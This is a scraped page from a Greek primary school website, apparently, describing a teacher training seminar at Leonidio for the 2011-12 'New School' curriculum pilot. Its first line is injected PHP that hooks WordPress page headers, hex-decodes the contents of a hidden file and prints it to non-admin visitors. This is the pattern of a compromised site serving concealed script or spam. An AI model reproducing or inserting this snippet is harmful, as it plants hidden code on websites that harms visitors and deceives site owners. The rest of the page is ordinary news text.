if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Επιμόρφωση Εκπαιδευτικών Δημοτικού Σχολείου Λεωνιδίου |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Επιμόρφωση Εκπαιδευτικών Δημοτικού Σχολείου Λεωνιδίου

Στο πλαίσιο της Πράξης «ΝΕΟ ΣΧΟΛΕΙΟ (Σχολείο 21ου αιώνα) ? Νέο πρόγραμμα σπουδών» πραγματοποιήθηκε στο Δημοτικό Σχολείο Λεωνιδίου τριήμερο επιμορφωτικό σεμινάριο των εκπαιδευτικών από τους επιμορφωτές του Παιδαγωγικού Ινστιτούτου κ. Αθανάσιο Γιαννίκα (Σχολικός Σύμβουλος), Κωνσταντίνο Βρυώνη (Δάσκαλος Επιμορφωτής) και Πήλιουρα Παναγιώτη (Σχολικός Σύμβουλος).

Κατά το σχολικό έτος 2011-12, θα εφαρμοστούν πιλοτικά σε 188 πιλοτικές σχολικές μονάδες (21 νηπιαγωγεία, 99 δημοτικά, 68 γυμνάσια). Κατά την πιλοτική εφαρμογή, τα Νέα Προγράμματα Σπουδών θα ανατροφοδοτούνται από την εκπαιδευτική πράξη ώστε να εμπλουτισθούν και να βελτιωθούν όπου αυτό είναι αναγκαίο.

Για την επίτευξη των στόχων του προγράμματος προβλέπεται:

(α) Να γίνει στοχευμένη επιμόρφωση όλων των εμπλεκομένων με την πιλοτική εφαρμογή (εκπαιδευτικών, διευθυντών σχολικών μονάδων, εκπαιδευτών εκπαιδευτικών, Σχολικών Συμβούλων).

(β) Να γίνει ευρείας έκτασης πιλοτική εφαρμογή των νέων Π.Σ. σε επιλεγμένες σχολικές μονάδες «πιλοτικά» σχολεία» (νηπιαγωγεία, δημοτικά και γυμνάσια).

(γ) Να εξασφαλιστεί η παρακολούθηση και υποστήριξη του έργου των εκπαιδευτικών, ώστε άμεσα να καλύπτεται οποιαδήποτε ανάγκη παρουσιάζεται και να επιλύονται τυχόν προβλήματα που προκύπτουν. Τα πιλοτικά σχολεία θα έχουν τη δυνατότητα ανατροφοδοτικής επικοινωνίας.

(δ) Να γίνει εκτενής χρήση της εσωτερικής διαμορφωτικής αξιολόγησης καθώς και εξωτερική αξιολόγηση, ώστε να παρακολουθηθεί η πορεία και η αποτελεσματικότητα της εισαγωγής του συνόλου των νέων Π.Σ. Η καταγραφή και η επεξεργασία του συνόλου των δεδομένων που θα προκύψουν από τις διαδικασίες της πιλοτικής εφαρμογής θα επιτρέψουν την εξαγωγή συμπερασμάτων για την τελική διαμόρφωση και των Προγραμμάτων Σπουδών καθώς και του απαραίτητου διδακτικού υλικού, με στόχο την αποτελεσματικότερη γενίκευση της εφαρμογής τους.